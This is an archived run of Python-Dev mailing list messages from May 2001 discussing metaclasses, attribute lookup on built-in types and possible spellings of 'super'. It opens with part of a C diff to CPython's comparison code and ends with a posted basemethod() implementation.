-			if (err < 0)
+		if (tp->tp_as_number != NULL ||
+		    w->ob_type->tp_as_number != NULL) {
+			PyObject *res;
+			int c;
+			res = PyNumber_Compare(v,w);
+			if (res == NULL)
 				return -1;
-			else if (err == 0) {
-				int cmp = (*v->ob_type->tp_compare)(v, w);
-				Py_DECREF(v);
-				Py_DECREF(w);
-				return cmp;
+			if (!PyInt_Check(res)) {
+			    PyErr_SetString(PyExc_TypeError,
+					"comparison did not return an int");
+			    return -1;
 			}
+			c = PyInt_AS_LONG(res);
+			Py_DECREF(res);
+			return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 		}
 		return strcmp(tp->tp_name, w->ob_type->tp_name);
 	}
 	if (tp->tp_compare == NULL)
 		return (v < w) ? -1 : 1;


-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Wed May  2 10:09:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 11:09:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <3AEFCEBD.2E5979C9@lemburg.com>

Guido van Rossum wrote:
> 
> While implementing more class-like behavior for built-in types in the
> experimental descr-branch in the 2.2 CVS tree, I've noticed problems
> caused by Python's collapsing of class attributes and instance
> attributes.
> 
> For example, suppose d is a dictionary.  My experimental changes make
> d.__class__ return DictType (from the types module).
> (DictType.__class__ is TypeType, by the way.)  I also added special
> methods.  For example, d.__repr__() now returns repr(d).  I am
> preparing for subclassing of built-in types, so I will eventually be
> able to derive a class MyDictType from DictType, as follows:
> 
> class MyDictType(DictType):
>   ...
> 
> Now comes the fun part.  Suppose MyDictType wants to define its own
> repr():
> 
> class MyDictType(DictType):
>   def __repr__(self):
>     return "MyDictType(%s)" % DictType.__repr__(self)
> 
> But, (surprise, surprise!), DictType itself also has a __repr__()
> method: it returns the string "<type 'dictionary'>".
> 
> So the above code would fail: DictType.__repr__() returns
> repr(DictType), and DictType.__repr__(self) raises an argument count
> error.  The correct __repr__ method for dictionary objects can be
> found as DictType.__dict__['__repr__'], but that looks hideous!
> 
> What to do?  Pragmatically, I can make DictType.__repr__ return
> DictType.__dict__['__repr__'], and all will be well in this example.
> But we have to tread carefully here: DictType.__class__ is TypeType,
> but DictType.__dict__['__class__'] is a descriptor for the __class__
> attribute on dictionary objects.
> 
> The best rule I can think of so far is that DictType.__dict__ gives
> the *true* set of attribute descriptors for dictionary objects, and is
> thus similar to Smalltalks's class.methodDict that Jim describes
> below.  DictType.foo is a shortcut that can resolve to either
> DictType.__dict__['foo'] or to an attribute (maybe a method) of
> DictType described in TypeType.__dict__['foo'], whichever is defined.
> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

I'm not sure I can follow you here: DictType.__repr__ is the
representation method of the dictionary and not inherited
from TypeType, so there should be no problem.

The problem with the misleading error message would only show
up in case DictType does not define a __repr__ method. Then the
inherited one from TypeType would come into play and cause
the problem you mention above.

Thinking in terms of meta-classes, I believe we should implement
this mechanism in the meta-class (TypeType in this case). Its
__getattr__() will have to decide whether or not to expose its
own methods and attributes or not. 

The only catch here is that currently instances and classes have 
control of whether and how to bind found functions as methods or not. 
We should  probably change that to pass complete control over to the 
meta-class object and remove the special control flows currently found
in instance_getattr2() and class_lookup().

In general, I think that meta-classes should not expose their
attributes to the class objects they create, since this causes
way to many problems.

Perhaps I'm oversimplifying things here, but I have a feeling that
we can go a long way by actually trying to see meta-classes as 
first class members in the interpreter design and moving all the 
binding and lookup mechanisms over to this object type. The special 
casing should then take place in the meta-class rather than its 
creations.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller@ion-tof.com  Wed May  2 11:57:42 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 12:57:42 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>  <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>

> > The most common use for these seems to be for calling
> > inherited methods, so perhaps something like
> > 
> >    inherited MyBaseClass.foo(arg, ...)
> > 
> > which would be equivalent to
> > 
> >    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> > 
> > where getmethod() is a new builtin like getattr()
> > except that it looks in the __classdict__, and 'self'
> > is really whatever the first argument of the containing
> > method was.
> 
> The second most common use is to reference class variables
> (e.g. imagine a class that keeps counters of how many instances have
> been created and deleted in C.initcount and C.delcount).  But these
> should not have to change, since they really are class attributes.
> 
> > Now that we have __future__, would such a change be contemplatable?
> > Or is it too radical to even think about?
> 
> If we can find a way to spell "super.method", we should be ready for
> the future.  I can't think of something right off the bat
> unfortunately.

Could we make

  super(self, MyBaseClass).foo(arg, ...)

behave similar to

  MyBaseClass.foo(self, arg, ...)

Wrapping this stuff in a function would probably also
enable to use the same pattern in existing python versions.

Thomas


From thomas.heller@ion-tof.com  Wed May  2 12:12:21 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 13:12:21 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>

> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
> how metaclasses work in Smalltalk.  He should know, since he invented
> them! :-)  I include it below, with his permission.

I found this very interesting reading.

[From Jim Althoff]
> In the list below, indentation indicates class hieararchy (superclass --
> subclass)
The indentation, unfortunately, seems to be destroyed.

> 
> plain-class
> ----------------
> <none>
> o Class
>    o  Object                                                   isInstanceOf
> o ObjectMetaClass                     isInstanceOf  MetaClass
>         o Class                                                isInstanceOf
> o ClassMetaClass                    isInstanceOf  MetaClass
>             o MetaClass                                  isInstanceOf
> o MetaClassMetaClass      isInstanceOf  MetaClass
>         . . .
>         o Rectangle                                        isInstanceOf
> o RectangleMetaClass          isInstanceOf  MetaClass
>             o SpecializedRectangle            isInstanceOf
> o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

A question for Jim (this is more Smalltalk than Python related):
How does the Behaviour class fit into this picture?

Thhomas


From guido@digicool.com  Wed May  2 13:15:57 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 07:15:57 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200."
 <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
 <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>

> > If we can find a way to spell "super.method", we should be ready for
> > the future.  I can't think of something right off the bat
> > unfortunately.
> 
> Could we make
> 
>   super(self, MyBaseClass).foo(arg, ...)
> 
> behave similar to
> 
>   MyBaseClass.foo(self, arg, ...)
> 
> Wrapping this stuff in a function would probably also
> enable to use the same pattern in existing python versions.

Yes, I can see how to write super() using current tools (or 1.5.2
even).  The problem is that this makes super calls even more wordy
than they already are!  I can't think of anything that wouldn't
require compiler support though.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward@python.net  Wed May  2 13:57:41 2001
From: gward@python.net (Greg Ward)
Date: Wed, 2 May 2001 08:57:41 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
Message-ID: <20010502085741.B515@gerg.ca>

On 02 May 2001, Guido van Rossum said:
> Yes, I can see how to write super() using current tools (or 1.5.2
> even).  The problem is that this makes super calls even more wordy
> than they already are!  I can't think of anything that wouldn't
> require compiler support though.

I was just doing some gedanken with various ways to spell "super", and I
think my favourite is the same as Java's (as I remember it):

class MyClass (BaseClass):
    def foo (self, arg1, arg2):
         super.foo(arg1, arg2)


Since I don't know much about Python's guts, I can't say how
implementable this is, but I like the spelling.  The semantics would be
something like this (with adjustments to the reality of Python's guts):

  * 'super' is a magic object that only makes sense inside a 'def'
    inside a 'class' (at least for now; perhaps it could be generalized
    to work at class scope as well as method scope, but let's keep
    it simple)

  * super's notional __getattr__() does something like this:
    - peek at the calling stack frame and fetch the calling function
      (MyClass.foo) and the first argument to that function (self)
    - [is this possible?] ensure that calling_function is a bound
      method, and that it's bound to the self object we just plucked
      from the stack; raise a "misuse of super object" exception if not
    - walk the superclass tree starting at self.__class__.__bases__
      (ie. skip self's class), looking for an object with the name
      passed to this __getattr__() call -- 'foo'
    - when found, return it
    - if not found, raise AttributeError

The ability to peek at the calling stack frame is essential to this
scheme, in order to fetch the "current object" (self) without needing to
have it explicitly passed.  Is this as bothersome from C as it is from
Python?

        Greg
-- 
Greg Ward - nerd                                        gward@python.net
http://starship.python.net/~gward/
In space, no one can hear you fart.


From mal@lemburg.com  Wed May  2 14:07:27 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 15:07:27 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <3AF0068F.32388C87@lemburg.com>

Greg Ward wrote:
> 
> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> ...

This doesn't work in Python since Python has multiple inheritence,
e.g. super in 

class A(B,C):
	def foo(self):
		super.foo()

is ambiguous.

I'd rather suggest adding a function for finding the basemethod
of a method. This is probably the most common task in this context.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From thomas.heller@ion-tof.com  Wed May  2 14:12:40 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 15:12:40 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook>

[Greg Ward]

> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)
> 
>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not
>     - walk the superclass tree starting at self.__class__.__bases__
Caareful!
The search in the above context must start at MyClass.__bases__
which may not be the same as self.__class__.__bases__.

Thomas


From guido@digicool.com  Wed May  2 15:29:03 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:29:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400."
 <20010502085741.B515@gerg.ca>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
 <20010502085741.B515@gerg.ca>
Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>

[Greg Ward, welcome back!]
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)

I'm sure that's everybody's favorite way to spell it!  It's mine too. :-)

> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)

Yes, that's about the only way it can be made to work.  The compiler
will have to (1) detect that 'super' is a free variable, and (2) make
it a local and initialize it with the proper magic.  Or, to relieve
the burden from the symbol table, we could make super a keyword, at
the cost of breaking existing code.

I don't think super is needed outside methods.

>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not

I don't think you can make that test, but making it a 'magic local'
as I suggested above would avoid the problem.

>     - walk the superclass tree starting at self.__class__.__bases__
>       (ie. skip self's class), looking for an object with the name
>       passed to this __getattr__() call -- 'foo'
>     - when found, return it
>     - if not found, raise AttributeError

Yup, that's the easy part. :-)

> The ability to peek at the calling stack frame is essential to this
> scheme, in order to fetch the "current object" (self) without needing to
> have it explicitly passed.  Is this as bothersome from C as it is from
> Python?

No, in C it's easy.  The problem is that there is no information in
the frame that tells you where the currently executing function was
defined -- all you have is the code object, which is
context-independent.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May  2 15:30:20 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:30:20 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200."
 <3AF0068F.32388C87@lemburg.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
 <3AF0068F.32388C87@lemburg.com>
Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com>

> This doesn't work in Python since Python has multiple inheritence,
> e.g. super in 
> 
> class A(B,C):
> 	def foo(self):
> 		super.foo()
> 
> is ambiguous.

I'm not sure what you mean.  The search is totally well-defined: first
search B for a foo method, then search C.

> I'd rather suggest adding a function for finding the basemethod
> of a method. This is probably the most common task in this context.

I've never heard of the concept of basemethod, but if I may venture a
guess, it would be the same definition as I give above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@digicool.com  Wed May  2 14:38:42 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 2 May 2001 09:38:42 -0400 (EDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
 <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
 <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
 <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
 <20010502085741.B515@gerg.ca>
 <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <15088.3554.953359.757584@slothrop.digicool.com>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

  >> Since I don't know much about Python's guts, I can't say how
  >> implementable this is, but I like the spelling.  The semantics
  >> would be something like this (with adjustments to the reality of
  >> Python's guts):
  >>
  >> * 'super' is a magic object that only makes sense inside a 'def'
  >> inside a 'class' (at least for now; perhaps it could be
  >> generalized to work at class scope as well as method scope, but
  >> let's keep it simple)

  GvR> Yes, that's about the only way it can be made to work.  The
  GvR> compiler will have to (1) detect that 'super' is a free
  GvR> variable, and (2) make it a local and initialize it with the
  GvR> proper magic.  Or, to relieve the burden from the symbol table,
  GvR> we could make super a keyword, at the cost of breaking existing
  GvR> code.

  GvR> I don't think super is needed outside methods.

It seems helpful to clarify here, since this came up in conversation
at PythonLabs just the other day with the yield statement.

If we try to avoid keywords, we have to take the "well, I don't see
anyone assigning to this name" route.  If the compiler does not detect
any assignment to a nearly reserved word, like super, it would give
the use of that word special meaning.

There are a bunch of little problems.  A module could (not necessarily
should) be designed to have a global name poked into its namespace;
this would break, because the name would already have transmogrified
from a regular variable into a special one.  The use of exec or import
star would make it impossible for the word to take on its special
meaning.

So keywords really are a lot clearer, but they have the potential to
be incompatible.

Jeremy


From fredrik@pythonware.com  Wed May  2 15:00:55 2001
From: fredrik@pythonware.com (Fredrik Lundh)
Date: Wed, 2 May 2001 16:00:55 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>              <20010502085741.B515@gerg.ca>  <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff>

guido wrote:

> > class MyClass (BaseClass):
> >     def foo (self, arg1, arg2):
> >          super.foo(arg1, arg2)
>
> I'm sure that's everybody's favorite way to spell it!

not mine.  my brain contains far too much Python 1.5.2 code
for it to accept that some variables are dynamically scoped,
while others are lexically scoped.

why not spell it out:

    self.__super__.foo(arg1, arg2)

or

    self.super.foo(arg1, arg2)

or

    super(self).foo(arg1, arg2)

> Or, to relieve the burden from the symbol table, we could make super
> a keyword, at the cost of breaking existing code.

hey, how about introducing $ as a keyword prefix for newly introduced
keywords?

    $super.foo(arg1, arg2)

(this can of course be mapped to either of my previous suggestions;
"$foo" either means "self.foo" or "foo(self)"...)

and to save a little typing, only use it for keywords that start with
an "s" (should leave us plenty of expansion room):

    $uper.foo(arg1, arg2)

otoh, if "super" is common enough to motivate introducing magic objects
into python, maybe "$" should mean "super."?

    $foo(arg1, arg2)

and while we're at it, let's introduce "@" for "self.".

gotta run -- time for my monthly reboot /F


From guido@digicool.com  Wed May  2 16:03:37 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:03:37 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200."
 <3AEFCEBD.2E5979C9@lemburg.com>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
 <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com>

[me]
> > The best rule I can think of so far is that DictType.__dict__ gives
> > the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalks's class.methodDict that Jim describes
> > below.  DictType.foo is a shortcut that can resolve to either
> > DictType.__dict__['foo'] or to an attribute (maybe a method) of
> > DictType described in TypeType.__dict__['foo'], whichever is defined.
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

[MAL]
> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that both a dictionary object (call it d) and its type
(DictType) have a __repr__ method: repr(d) returns "d", and
repr(DictType) returns "<type 'dictionary'>".

Given the analogy with classes, where str(x) invokes x.__str__() and
x.__str__() can also be called directly, it is not unreasonable to
expect that this works in general, so that repr(d) can be spelled as

    d.__repr__()

and repr(DictType) as

    DictType.__repr__()

And, given another analogy with classes, where x.foo() is equivalent
to x.__class__.foo(x), the two forms above should also be equivalent
to

    d.__class__.__repr__(d)

and

    DictType.__class__.__repr__(DictType)

But since d.__class__ is DictType, we now have two conflicting ways to
derive a meaning for DictType.__repr__: the first one going

    repr(DictType) => DictType.__repr__()

and the second one going

    repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d)

The rule quoted above chooses the second meaning, from the very
pragmatic point that once I allow subclassing from DictType, such a
subclass might very well want to override __repr__ to wrap the base
class __repr__, and the conventional way to reference that (barring
the implementation of 'super') is DictType.__repr__.  Direct
invocation of an object's own __repr__ method as x.__repr__() is much
les common.  The implementation of repr(x) can do the right thing,
which is to look for x.__class__.__dict__['__repr__'].

> The problem with the misleading error message would only show
> up in case DictType does not define a __repr__ method. Then the
> inherited one from TypeType would come into play and cause
> the problem you mention above.

No, the issue is not inheritance: I haven't implemented inheritance
yet.  DictType is an instance of TypeType but doesn't inherit from it.

> Thinking in terms of meta-classes, I believe we should implement
> this mechanism in the meta-class (TypeType in this case). Its
> __getattr__() will have to decide whether or not to expose its
> own methods and attributes or not.

That's exactly how I solved it: type_getattro() implements the rule
quoted at the top.

> The only catch here is that currently instances and classes have
> control of whether and how to bind found functions as methods or not.
> We should  probably change that to pass complete control over to the
> meta-class object and remove the special control flows currently found
> in instance_getattr2() and class_lookup().

Um, yeah, that's where I think this will end up causing more trouble.

Right now, if x is an instance, some attributes like x.__class__ and
x.__dict__ special-cased in instance_getattr().  The mechanism I
propose removes the need for (most of) such special cases, and instead
allows the class to provide "descriptors" for instance attributes.
So, for example, if instances of a class C have an attribute named
foo, C.__dict__['foo'] contains the descriptor for that attribute, and
that is how the implementation decides how to interpret x.foo
(assuming x is an instance of C).  We may be able to access this same
descriptor as C.foo, but that's really only important for backwards
compatibility with the way classes work today.

> In general, I think that meta-classes should not expose their
> attributes to the class objects they create, since this causes
> way to many problems.

I agree.

> Perhaps I'm oversimplifying things here, but I have a feeling that
> we can go a long way by actually trying to see meta-classes as
> first class members in the interpreter design and moving all the
> binding and lookup mechanisms over to this object type. The special
> casing should then take place in the meta-class rather than its
> creations.

Yes, that's where I'm heading!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 15:02:41 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:02:41 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
 <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF01381.592AE31B@lemburg.com>

Guido van Rossum wrote:
> 
> > This doesn't work in Python since Python has multiple inheritence,
> > e.g. super in
> >
> > class A(B,C):
> >       def foo(self):
> >               super.foo()
> >
> > is ambiguous.
> 
> I'm not sure what you mean.  The search is totally well-defined: first
> search B for a foo method, then search C.

I thought you were talking about an abstract super class which is
how Java uses this term. 

Rereading some of the posts, I think you are indeed referring to
the method which foo overrides -- this is what I call basemethod
(since it is implemented in one of the base classes).
 
> > I'd rather suggest adding a function for finding the basemethod
> > of a method. This is probably the most common task in this context.
> 
> I've never heard of the concept of basemethod, but if I may venture a
> guess, it would be the same definition as I give above.

The basemethod can be defined as the first method of the same name
found in the inheritence tree using the standard Python lookup 
strategy (left-right, depth first) when continuing the lookup search
at the node in the inheritence tree which defines the method querying
the basemethod.

In other words: you let Python continue the search for the method
as if it hadn't found the occurrance calling the bsaemethod()
API. Hmm, still not clear enough... better let Tim jump in here
(we've had a discussion about basemethod() some months or years
ago). Tim ?

Note that there are many ways of defining what a basemethod
is, due to the ambiguities that are caused by multiple inheritence
(e.g. the same base class may appear in different branches of the
inheritence tree).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido@digicool.com  Wed May  2 16:05:30 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 10:05:30 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200."
 <000d01c0d310$4ee127d0$0900a8c0@spiff>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
 <000d01c0d310$4ee127d0$0900a8c0@spiff>
Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com>

> guido wrote:
> 
> > > class MyClass (BaseClass):
> > >     def foo (self, arg1, arg2):
> > >          super.foo(arg1, arg2)
> >
> > I'm sure that's everybody's favorite way to spell it!
> 
> not mine.  my brain contains far too much Python 1.5.2 code
> for it to accept that some variables are dynamically scoped,
> while others are lexically scoped.
> 
> why not spell it out:
> 
>     self.__super__.foo(arg1, arg2)
> 
> or
> 
>     self.super.foo(arg1, arg2)
> 
> or
> 
>     super(self).foo(arg1, arg2)
> 
> > Or, to relieve the burden from the symbol table, we could make super
> > a keyword, at the cost of breaking existing code.
> 
> hey, how about introducing $ as a keyword prefix for newly introduced
> keywords?
> 
>     $super.foo(arg1, arg2)
> 
> (this can of course be mapped to either of my previous suggestions;
> "$foo" either means "self.foo" or "foo(self)"...)
> 
> and to save a little typing, only use it for keywords that start with
> an "s" (should leave us plenty of expansion room):
> 
>     $uper.foo(arg1, arg2)
> 
> otoh, if "super" is common enough to motivate introducing magic objects
> into python, maybe "$" should mean "super."?
> 
>     $foo(arg1, arg2)
> 
> and while we're at it, let's introduce "@" for "self.".
> 
> gotta run -- time for my monthly reboot /F

LOL!  But you forgot the spelling of

    self.__super.foo(arg1, arg2)

which would pass in the class name that's the other necessary input to
a proper implementation of super. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed May  2 15:04:29 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 16:04:29 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
 <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com>
Message-ID: <3AF013ED.8A190FE2@lemburg.com>

Here's an implementation of what I currently use to track down
the basemethod (taken from mx.Tools):

import types
_basemethod_cache = {}

def basemethod(object,method=None,

               cache=_basemethod_cache,InstanceType=types.InstanceType,
               ClassType=types.ClassType,None=None):

    """ Return the unbound method that is defined *after* method in the
        inheritance order of object with the same name as method
        (usually called base method or overridden method).

        object can be an instance, class or bound method. method, if
        given, may be a bound or unbound method. If it is not given,
        object must be bound method.

        Note: Unbound methods must be called with an instance as first
        argument.

        The function uses a cache to speed up processing. Changes done
        to the class structure after the first hit will not be noticed
        by the function.

        XXX Rewrite in C to increase performance.

    """
    if method is None:
        method = object
        object = method.im_self
    defclass = method.im_class
    name = method.__name__
    if type(object) is InstanceType:
        objclass = object.__class__
    elif type(object) is ClassType:
        objclass = object
    else:
        objclass = object.im_class

    # Check cache
    cacheentry = (defclass, name)
    basemethod = cache.get(cacheentry, None)
    if basemethod is not None:
        if not issubclass(objclass, basemethod.im_class):
            if __debug__:
                sys.stderr.write(
                    'basemethod(%s, %s): cached version (%s) mismatch: '
                    '%s !-> %s\n' %
                    (object, method, basemethod,
                     objclass, basemethod.im_class))
        else:
            return basemethod

    # Find defining class
    path = [objclass]
    while 1:
        if not path:
            raise AttributeError,method
        c = path[0]
        del path[0]
        if c.__bases__:
            # Prepend bases of the class
            path[0:0] = list(c.__bases__)
        if c is defclass:
            # Found (first occurance of) defining class in inheritance
            # graph
            break
        
    # Scan rest of path for the next occurance of a method with the
    # same name
    while 1:
        if not path:
            raise AttributeError,name
        c = path[0]
        basemethod = getattr(c, name, None)
        if basemethod is not None:
            # Found; store in cache and return
            cache[cacheentry] = basemethod
            return basemethod
        del path[0]
    raise AttributeError,'method %s' % name
    
-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
